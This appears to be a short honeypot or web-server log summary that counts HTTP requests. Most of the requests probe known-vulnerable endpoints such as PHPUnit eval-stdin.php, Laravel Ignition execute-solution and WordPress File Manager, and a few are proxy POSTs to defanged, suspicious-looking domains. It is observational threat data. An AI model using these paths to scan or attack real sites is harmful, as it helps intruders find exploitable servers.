1 GET /wp-content/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//allisonhayden[.]xyz/18358998181a288abcff71502fd3dc5eae98cf7645ffb680c203f1f67de1b2b7e5e2971e687723107198f8e0cc77ef44f575ebfd90a5f9f5a7150683e70c49d3ee8db60a3d3ee957dd69b23feb125cc723917ab036c4ca12ec0b2b0c1dc26438 HTTP/1.1
1 POST http[:]//ruthmori[.]best/bceff4a03c3c9e3a85e7a0c1ca8e339e3e56528f5596a5799ac6b4676fe98b3c755f1f30b2dc862437d23cb79122e075abfd3fa82a276d89d7132791b6b9d225ce2da686ab11fbc93cb9fae223843a02a728a6fbb3f394a1b91e004298425205 HTTP/1.1